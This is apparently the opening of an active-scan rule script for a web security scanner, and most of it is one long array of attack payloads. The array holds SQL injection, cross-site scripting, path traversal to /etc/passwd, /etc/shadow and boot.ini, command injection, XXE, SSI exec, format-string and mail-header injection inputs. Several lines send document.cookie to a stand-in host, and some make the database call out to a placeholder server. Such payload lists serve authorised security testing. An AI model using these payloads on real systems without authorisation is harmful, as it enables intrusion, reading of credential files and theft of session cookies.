// An example active scan rule script which uses a set of attack payloads and a set of regexes
// in order to find potential issues.
// Replace or extend the attacks and evidence regexes with you own values.

// Note that new active scripts will initially be disabled
// Right click the script in the Scripts tree and select 'enable'  

// Replace or extend these with your own attacks
// put the attacks you most want to run higher, unless you disable the attack strength check
var attacks = [
	"", 
"'",  
"@#$%%#$%#$@#$%$$@#$%^**(()",  
"@#0%#0##018387@#0^**(()",  
"'",  
"' or 'a'='a'",  
"' or 'x'='x'",  
"' or 0=0 #",  
"' or 0=0 --",  
"' or 1=1--",  
"'' or 1 --''",  
"') or ('a'='a'",  
"'<?xml version='1.0' encoding='ISO-8859-1'?><ELEMENT foo ANY><////dev/random'>]><foo>&xxe;</foo>'",  
"'<?xml version='1.0' encoding='ISO-8859-1'?><ELEMENT foo ANY><////etc/passwd''>]><foo>&xxe;</foo>'",  
"'<?xml version='1.0' encoding='ISO-8859-1'?><foo><[CDATA[' or 1=1 or ''=']]></foo>'",  
"'<?xml version='1.0' encoding='ISO-8859-1'?><foo><[CDATA[>]]>alert('XSS');<[CDATA[>]]></foo>'",  
"'<HTML xmlns:xss><?import namespace='xss' implementation='http://ha.ckers.org/xss.htc'><xss:xss>XSS</xss:xss></HTML>'",  
"'<xml ID='xss'><I><B><IMG SRC='javas<alert('XSS')''></B></I></xml><SPAN DATASRC=''#xss'' DATAFLD=''B'' DATAFORMATAS=''HTML''></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>'",  
"'<xml ID=I><X><C><[CDATA[cript:alert('XSS');''>]]>'",  
"'><script>'",  
"'><script>alert(1)</script>",  
"'><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>",  
"'>xxx<P>yyy",  
"'\t'",  
"#",  
"#&apos;",  
"#'",  
"#xA",  
"#xA#xD",  
"#xD",  
"#xD#xA",  
"$NULL",  
"$null",  
"%",  
"%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%",  
"%00",  
"%00../../../../../../etc/passwd",  
"%00../../../../../../etc/shadow",  
"%00/",  
"%00/etc/passwd%00",  
"%01%02%03%04%0a%0d%0aADSF",  
"%08x",  
"%0A/usr/bin/id",  
"%0A/usr/bin/id%0A",  
"%0Aid",  
"%0Aid%0A",  
"%0a ping -i 30 127.0.0.1 %0a",  
"%oa ping -n 30 127.0.0.1 %0a",  
"%0a id %0a",  
"%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a",  
"%0d",  
"%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a",  
"%0d%0aX-Injection-Header:%20AttackValue",  
"%20",  
"%20$(sleep%2050)",  
"%20'sleep%2050'",  
"%20d",  
"%20n",  
"%20s",  
"%20x",  
"%20|",  
"%21",  
"%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E",  
"%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini",  
"%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00",  
"%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00",  
"%2500",  
"%250a",  
"%26",  
"%27%20or%201=1",  
"%28",  
"%29",  
"%2A",  
"%2A%28%7C%28mail%3D%2A%29%29",  
"%2A%28%7C%28objectclass%3D%2A%29%29",  
"%2A%7C",  
"%2C",  
"%2e%2e%2f",  
"%3C",  
"%3C%3F",  
"%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E",  
"%3cscript%3ealert('XSS');%3c/script%3e",  
"%3cscript%3ealert(document.cookie);%3c%2fscript%3e",  
"%5C",  
"%5C/",  
"%60",  
"%7C",  
"%7f",  
"%99999999999s",  
"%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A",  
"%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E",  
"%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F",  
"%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G",  
"%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X",  
"%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a",  
"%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d ",  
"%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e",  
"%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f",  
"%ff",  
"%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g",  
"%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i",  
"%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o",  
"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p",  
"%s%p%x%d",  
"%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s",  
"%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u",  
"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x",  
"&",  
"& id",  
"& ping -i 30 127.0.0.1 &",  
"& ping -n 30 127.0.0.1 &",  
"&#0000060",  
"&#0000060;",  
"&#000060",  
"&#000060;",  
"&#00060",  
"&#00060;",  
"&#0060",  
"&#0060;",  
"&#060",  
"&#060;",  
"&#10;",  
"&#10;&#13;",  
"&#13;",  
"&#13;&#10;",  
"&#60",  
"&#60;",  
"&#X000003C",  
"&#X000003C;",  
"&#X000003c",  
"&#X000003c;",  
"&#X00003C",  
"&#X00003C;",  
"&#X00003c",  
"&#X00003c;",  
"&#X0003C",  
"&#X0003C;",  
"&#X0003c",  
"&#X0003c;",  
"&#X003C",  
"&#X003C;",  
"&#X003c",  
"&#X003c;",  
"&#X03C",  
"&#X03C;",  
"&#X03c",  
"&#X03c;",  
"&#X3C",  
"&#X3C;",  
"&#X3c",  
"&#X3c;",  
"&#x000003C",  
"&#x000003C;",  
"&#x000003c",  
"&#x000003c;",  
"&#x00003C",  
"&#x00003C;",  
"&#x00003c",  
"&#x00003c;",  
"&#x0003C",  
"&#x0003C;",  
"&#x0003c",  
"&#x0003c;",  
"&#x003C",  
"&#x003C;",  
"&#x003c",  
"&#x003c;",  
"&#x03C",  
"&#x03C;",  
"&#x03c",  
"&#x03c;",  
"&#x3C",  
"&#x3C;",  
"&#x3c",  
"&#x3c;",  
"&LT",  
"&LT;",  
"&apos;",  
"&apos;%20OR",  
"&id",  
"&lt",  
"&lt;",  
"&lt;--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;",  
"&lt;--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;",  
"&lt;--#exec%20cmd=&quot;/usr/bin/id;--&gt;",  
"&lt;&gt;&quot;'%;)(&amp;+",  
"&ltscript&gtalert(document.cookie);&ltscript&gtalert",  
"&ltscript&gtalert(document.cookie);</script>",  
"&quot;;id&quot;",  
"'",  
"' (select top 1",  
"' --",  
"' ;",  
"' UNION ALL SELECT",  
"' UNION SELECT",  
"' or ''='",  
"' or '1'='1",  
"' or '1'='1'--",  
"' or 'x'='x",  
"' or (EXISTS)",  
"' or 0=0 #",  
"' or 0=0 --",  
"' or 1 in (@@version)--",  
"' or 1=1 or ''='",  
"' or 1=1--",  
"' or a=a--",  
"' or uid like '%",  
"' or uname like '%",  
"' or user like '%",  
"' or userid like '%",  
"' or username like '%",  
"'%20or%201=1",  
"'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E",  
"'';--'<XSS>=&{()}",  
"') or ('a'='a",  
"'--",  
"'; exec master..xp_cmdshell",  
"'; exec xp_regread",  
"'; waitfor delay '0:30:0'--",  
"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//></SCRIPT>--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}",  
"';shutdown--",  
"'><script>alert(document.cookie);</script>",  
"'><script>alert(document.cookie)</script>",  
"'hi' or 'x'='x';",  
"'or select *",  
"'sqlattempt1",  
"'||UTL_HTTP.REQUEST",  
"'||Utl_Http.request('http://<yourservername>') from dual--",  
"(",  
"(')",  
"(sqlattempt2)",  
")",  
"))))))))))",  
"*",  
"*&apos;",  
"*'",  
"*(|(mail=*))",  
"*(|(objectclass=*))",  
"*/*",  
"*|",  
"+",  
"+%00",  
",@variable",  
"-",  
"--",  
"--';",  
"--sp_password",  
"-1",  
"-1.0",  
"-2",  
"-20",  
"-268435455",  
"..%%35%63",  
"..%%35c",  
"..%25%35%63",  
"..%255c",  
"..%5c",  
"..%bg%qf",  
"..%c0%af",  
"..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini",  
"..%u2215",  
"..%u2216",  
"../",  
"../../../../../../../../../../../../etc/hosts",  
"../../../../../../../../../../../../etc/hosts%00",  
"../../../../../../../../../../../../etc/passwd",  
"../../../../../../../../../../../../etc/passwd%00",  
"../../../../../../../../../../../../etc/shadow",  
"../../../../../../../../../../../../etc/shadow%00",  
"..\'",  
"..\..\..\..\..\..\..\..\..\..\etc\passwd",  
"..\..\..\..\..\..\..\..\..\..\etc\passwd%00",  
"..\..\..\..\..\..\..\..\..\..\etc\shadow",  
"..\..\..\..\..\..\..\..\..\..\etc\shadow%00",  
".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd",  
".\\./.\\./.\\./.\\./.\\./.\\./etc/shadow",  
"/",  
"/%00/",  
"/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00",  
"/%2A",  
"/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",  
"/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow",  
"/&apos;",  
"/'",  
"/,%ENV,/",  
"/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd",  
"/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow",  
"/.../.../.../.../.../",  
"/../../../../../../../../%2A",  
"/../../../../../../../../../../../etc/passwd%00.html",  
"/../../../../../../../../../../../etc/passwd%00.jpg",  
"/../../../../../../../../../../etc/passwd",  
"/../../../../../../../../../../etc/passwd^^",  
"/../../../../../../../../../../etc/shadow",  
"/../../../../../../../../../../etc/shadow^^",  
"/../../../../../../../../bin/id|",  
"/..\../..\../..\../..\../..\../..\../boot.ini",  
"/..\../..\../..\../..\../..\../..\../etc/passwd",  
"/..\../..\../..\../..\../..\../..\../etc/shadow",  
"/./././././././././././etc/passwd",  
"/./././././././././././etc/shadow",  
"//",  
"//*",  
"/etc/passwd",  
"/etc/shadow",  
"/index.html|id|",  
"0",  
"0 or 1=1",  
"00",  
"0xfffffff",  
"1",  
"1 or 1 in (@@version)--",  
"1 or 1=1--",  
"1.0",  
"1; waitfor delay '0:30:0'--",  
"1;SELECT%20*",  
"1||Utl_Http.request('http://<yourservername>') from dual--",  
"2",  
"2147483647",  
"268435455",  
"65536",  
":response.write 111111",  
"<",  
"<  script > < / script>",  
"<",  
"<[CDATA[>]]>alert('XSS');<[CDATA[>]]>",  
"<[CDATA[<script>var n=0;while(true){n++;}</script>]]>",  
"</foo>",  
"<<",  
"<<<",  
"<<script>alert('XSS');//<</script>",  
"<>''%;)(&+",  
"<?",  
"<?xml version='1.0' encoding='ISO-8859-1'?><ELEMENT foo ANY><////dev/random'>]><foo>&xxe;</foo>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><ELEMENT foo ANY><////etc/passwd'>]><foo>&xxe;</foo>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><ELEMENT foo ANY><////etc/shadow'>]><foo>&xxe;</foo>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><ELEMENT foo ANY><//c:/boot.ini'>]><foo>&xxe;</foo>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><foo><[CDATA[' or 1=1 or ''=']]></foo>",  
"<?xml version='1.0' encoding='ISO-8859-1'?><foo><[CDATA[>]]>alert('XSS');<[CDATA[>]]></foo>",  
"<HTML xmlns:xss><?import namespace='xss' implementation='http://ha.ckers.org/xss.htc'><xss:xss>XSS</xss:xss></HTML>",  
"<IMG '''><SCRIPT>alert('XSS')</SCRIPT>'>",  
"<IMG DYNSRC='javascript:alert('XSS')'>",  
"<IMG LOWSRC='javascript:alert('XSS')'>",  
"<IMG SRC=' &#14;  javascript:alert('XSS');'>",  
"<IMG SRC='jav	ascript:alert('XSS');'>",  
"<IMG SRC='jav&#x09;ascript:alert('XSS');'>",  
"<IMG SRC='jav&#x0A;ascript:alert('XSS');'>",  
"<IMG SRC='jav&#x0D;ascript:alert('XSS');'>",  
"<IMG SRC='javascript:alert('XSS')'",  
"<IMG SRC='javascript:alert('XSS');'>",  
"<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",  
"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",  
"<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",  
"<IMG SRC=JaVaScRiPt:alert('XSS')>",  
"<IMG SRC=`javascript:alert(''XSS'')`>",  
"<IMG SRC=javascript:alert(&quot;XSS&quot;)>",  
"<IMG SRC=javascript:alert('XSS')>",  
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",  
"<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>",  
"<IMG%20SRC='javasc	ript:alert(document.cookie)'>",  
"<IMG%20SRC='javascript:alert(document.cookie)'>",  
"<foo></foo>",  
"<name>,'')); phpinfo(); exit;/*</name>",  
"<script>alert('XSS')</script>",  
"<script>alert(document.cookie)</script>",  
"<xml ID='xss'><I><B>&lt;IMG SRC='javas<alert('XSS')'&gt;</B></I></xml><SPAN DATASRC='#xss' DATAFLD='B' DATAFORMATAS='HTML'></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>",  
"<xml ID=I><X><C><[CDATA[cript:alert('XSS');'>]]>",  
"<xml SRC='xsstest.xml' ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>",  
"<xss><script>alert('XSS')</script></vulnerable>",  
"<youremail>%0aBcc:<youremail>",  
"<youremail>%0aCc:<youremail>",  
"<youremail>%0d%0aBcc:<youremail>",  
"<youremail>%0d%0aCc:<youremail>",  
"=",  
"='",  
"=--",  
"=;",  
">",  
"?x=",  
"?x='",  
"?x=>",  
"?x=|",  
"@&apos;",  
"@'",  
"@*",  
"@variable",  
"A",  
"ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|",  
"FALSE",  
"NULL",  
"PRINT",  
"PRINT @@variable",  
"TRUE",  
"XXXXX.%p",  
"XXXXX`perl -e 'print '.%p' x 80'`",  
"[&apos;]",  
"[']",  
"\'",  
"\';alert('XSS');//",  
"\'blah",  
"\&apos;",  
"\'",  
"\..\..\..\..\..\..\..\..\..\..\etc\passwd",  
"\..\..\..\..\..\..\..\..\..\..\etc\passwd%00",  
"\..\..\..\..\..\..\..\..\..\..\etc\shadow",  
"\..\..\..\..\..\..\..\..\..\..\etc\shadow%00",  
"\0",  
"\00",  
"\00\00",  
"\00\00\00",  
"\0\0",  
"\0\0\0",  
"\\",  
"\\&apos;/bin/cat%20/etc/passwd\\&apos;",  
"\\&apos;/bin/cat%20/etc/shadow\\&apos;",  
"\\/",  
"\\\\*",  
"\\\\?\\",  
"\n/bin/ls -al\n",  
"\n/usr/bin/id;",  
"\n/usr/bin/id\n",  
"\n/usr/bin/id|",  
"\nid;",  
"\nid\n",  
"\nid|",  
"\nnetstat -a%\n",  
"\t",  
"\u003C",  
"\u003c",  
"\x23",  
"\x27",  
"\x27UNION SELECT",  
"\x27\x4F\x52 SELECT *",  
"\x27\x6F\x72 SELECT *",  
"\x3C",  
"\x3D \x27",  
"\x3D \x3B'",  
"\x3c",  
"^&apos;",  
"^'",  
"`",  
"`/usr/bin/id`",  
"`dir`",  
"`id`",  
"`perl -e 'print '.%p' x 80'`%n",  
"`ping 127.0.0.1`",  
"a);/usr/bin/id",  
"a);/usr/bin/id;",  
"a);/usr/bin/id|",  
"a);id",  
"a);id;",  
"a);id|",  
"a)|/usr/bin/id",  
"a)|/usr/bin/id;",  
"a)|id",  
"a)|id;",  
"a;/usr/bin/id",  
"a;/usr/bin/id;",  
"a;/usr/bin/id|",  
"a;id",  
"a;id;",  
"a;id|",  
"http://<yourservername>/",  
"id%00",  
"id%00|",  
"insert",  
"like",  
"limit",  
"null",  
"or",  
"or 0=0 #",  
"or 0=0 --",  
"or 1=1--",  
"or%201=1",  
"or%201=1 --",  
"response.write 111111",  
"something%00html",  
"update",  
"x' or 1=1 or 'x'='y",  
"x' or name()='username' or 'x'='y",  
"xsstest",  
"xsstest%00'<>'",  
"{&apos;}",  
"|/usr/bin/id",  
"|/usr/bin/id|",  
"|id",  
"|id;",  
"|id|",  
"|ls",  
"|ls -la",  
"|nid\n",  
"|usr/bin/id\n",  
"||",  
"|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &",  
"||/usr/bin/id;",  
"||/usr/bin/id|",  
"}",  
"# a wide sample of malicious input for windows targets",  
"A",  
"TRUE",  
"FALSE",  
"0",  
"00",  
"1",  
"-1",  
"1.0",  
"-1.0",  
"2",  
"-2",  
"-20",  
"65536",  
"268435455",  
"-268435455",  
"2147483647",  
"0xfffffff",  
"NULL",  
"null",  
"\0",  
"\00",  
"<  script > < / script>",  
"%0a",  
"%00",  
"+%00",  
"\0",  
"\0\0",  
"\0\0\0",  
"\00",  
"\00\00",  
"\00\00\00",  
"$null",  
"$NULL",  
"`dir`",  
"\nnetstat -a%\n",  
"\'blah",  
"|dir|",  
"&quot;;id&quot;",  
"dir%00",  
"dir%00|",  
"|dir",  
"|dir|",  
"|/bin/ls -al",  
"?x=",  
"?x='",  
"?x=|",  
"?x=>",  
"/boot.ini",  
"ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|",  
"../../boot.ini",  
"/../../../../../../../../%2A",  
"%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00",  
"%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini",  
"/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini",  
"../../../../../../../../conf/server.xml",  
"C:/inetpub/wwwroot/global.asa",  
"C:\inetpub\wwwroot\global.asa",  
"C:/boot.ini",  
"C:\boot.ini",  
"../../../../../../../../../../../../localstart.asp%00",  
"../../../../../../../../../../../../localstart.asp",  
"../../../../../../../../../../../../boot.ini%00",  
"../../../../../../../../../../../../boot.ini",  
"/./././././././././././boot.ini",  
"/../../../../../../../../../../../boot.ini%00",  
"/../../../../../../../../../../../boot.ini",  
"/..\../..\../..\../..\../..\../..\../boot.ini",  
"/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini",  
"\..\..\..\..\..\..\..\..\..\..\boot.ini",  
"..\..\..\..\..\..\..\..\..\..\boot.ini%00",  
"..\..\..\..\..\..\..\..\..\..\boot.ini",  
"/../../../../../../../../../../../boot.ini%00.html",  
"/../../../../../../../../../../../boot.ini%00.jpg",  
"/.../.../.../.../.../",  
"..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini",  
"/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini",  
"%0d%0aX-Injection-Header:%20AttackValue",  
"@#0%#0##018387@#0^**(()",  
"%01%02%03%04%0a%0d%0aADSF",  
"/,%ENV,/",  
"&lt;--#exec%20cmd=&quot;dir&quot;--&gt;",  
"&lt;--#exec%20cmd=&quot;dir&quot;--&gt;",  
"%",  
"#",  
"*",  
"}",  
"/",  
"",  
"\\",  
"\\/",  
"\\\\*",  
"\\\\?\\",  
"&lt",  
"&lt;",  
"&LT",  
"&LT;",  
"<",  
"<<",  
"<<<",  
"|",  
"||",  
"`",  
"-",  
"--",  
"*|",  
"^'",  
"\'",  
"/'",  
"@'",  
"(')",  
"{'}",  
"[']",  
"*'",  
"#'",  
"'",  
"@#$%%#$%#$@#$%$$@#$%^**(()",  
"%01%02%03%04%0a%0d%0aADSF",  
"\t",  
"'\t'",  
"&#10;",  
"&#13;",  
"&#10;&#13;",  
"&#13;&#10;",  
"#xD",  
"#xA",  
"#xD#xA",  
"#xA#xD",  
"/%00/",  
"%00/",  
"%00",  
"<?",  
"%3C",  
"%3C%3F",  
"%60",  
"%5C",  
"%5C/",  
"%7C",  
"%00",  
"/%2A",  
"%2A",  
"%2C",  
"%20",  
"%20|",  
"%250a",  
"%2500",  
"../",  
"%2e%2e%2f",  
"..%u2215",  
"..%c0%af",  
"..%bg%qf",  
"..\'",  
"..%5c",  
"..%%35c",  
"..%255c",  
"..%%35%63",  
"..%25%35%63",  
"..%u2216",  
"&#60",  
"&#060",  
"&#0060",  
"&#00060",  
"&#000060",  
"&#0000060",  
"&#60;",  
"&#060;",  
"&#0060;",  
"&#00060;",  
"&#000060;",  
"&#0000060;",  
"&#x3c",  
"&#x03c",  
"&#x003c",  
"&#x0003c",  
"&#x00003c",  
"&#x000003c",  
"&#x3c;",  
"&#x03c;",  
"&#x003c;",  
"&#x0003c;",  
"&#x00003c;",  
"&#x000003c;",  
"&#X3c",  
"&#X03c",  
"&#X003c",  
"&#X0003c",  
"&#X00003c",  
"&#X000003c",  
"&#X3c;",  
"&#X03c;",  
"&#X003c;",  
"&#X0003c;",  
"&#X00003c;",  
"&#X000003c;",  
"&#x3C",  
"&#x03C",  
"&#x003C",  
"&#x0003C",  
"&#x00003C",  
"&#x000003C",  
"&#x3C;",  
"&#x03C;",  
"&#x003C;",  
"&#x0003C;",  
"&#x00003C;",  
"&#x000003C;",  
"&#X3C",  
"&#X03C",  
"&#X003C",  
"&#X0003C",  
"&#X00003C",  
"&#X000003C",  
"&#X3C;",  
"&#X03C;",  
"&#X003C;",  
"&#X0003C;",  
"&#X00003C;",  
"&#X000003C;",  
"\x3c",  
"\x3C",  
"\u003c",  
"\u003C",  
"something%00html",  
"&apos;",  
"/&apos;",  
"\&apos;",  
"^&apos;",  
"@&apos;",  
"{&apos;}",  
"[&apos;]",  
"*&apos;",  
"#&apos;",  
"'>xxx<P>yyy",  
"'><script>'",  
"<script>alert('XSS')</script>",  
"<<script>alert('XSS');//<</script>",  
"<script>alert(document.cookie)</script>",  
"'><script>alert(document.cookie)</script>",  
"'><script>alert(document.cookie);</script>",  
"\';alert('XSS');//",  
"%3cscript%3ealert('XSS');%3c/script%3e",  
"%3cscript%3ealert(document.cookie);%3c%2fscript%3e",  
"%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E",  
"&ltscript&gtalert(document.cookie);</script>",  
"&ltscript&gtalert(document.cookie);&ltscript&gtalert",  
"<xss><script>alert('XSS')</script></vulnerable>",  
"<IMG%20SRC='javascript:alert(document.cookie)'>",  
"<IMG SRC='javascript:alert('XSS');'>",  
"<IMG SRC='javascript:alert('XSS')'",  
"<IMG SRC=javascript:alert('XSS')>",  
"<IMG SRC=JaVaScRiPt:alert('XSS')>",  
"<IMG SRC=javascript:alert(&quot;XSS&quot;)>",  
"<IMG SRC=`javascript:alert(''XSS'')`>",  
"<IMG '''><SCRIPT>alert('XSS')</SCRIPT>'>",  
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",  
"<IMG%20SRC='javasc	ript:alert(document.cookie)'>",  
"<IMG SRC='jav	ascript:alert('XSS');'>",  
"<IMG SRC='jav&#x09;ascript:alert('XSS');'>",  
"<IMG SRC='jav&#x0A;ascript:alert('XSS');'>",  
"<IMG SRC='jav&#x0D;ascript:alert('XSS');'>",  
"<IMG SRC=' &#14;  javascript:alert('XSS');'>",  
"<IMG DYNSRC='javascript:alert('XSS')'>",  
"<IMG LOWSRC='javascript:alert('XSS')'>",  
"<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>",  
"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",  
"<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",  
"<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",  
"'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E",  
"'><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>",  
"%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E",  
